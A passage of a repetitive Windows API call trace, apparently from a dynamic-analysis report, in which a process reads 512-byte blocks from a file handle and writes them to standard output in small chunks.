lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: 
lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.160] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.160] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.161] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | 
out: lpNewFilePointer=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.161] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 
[0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.162] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.162] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.164] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.164] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType 
(hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.165] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.165] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, 
lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.167] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.167] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.168] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.168] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, 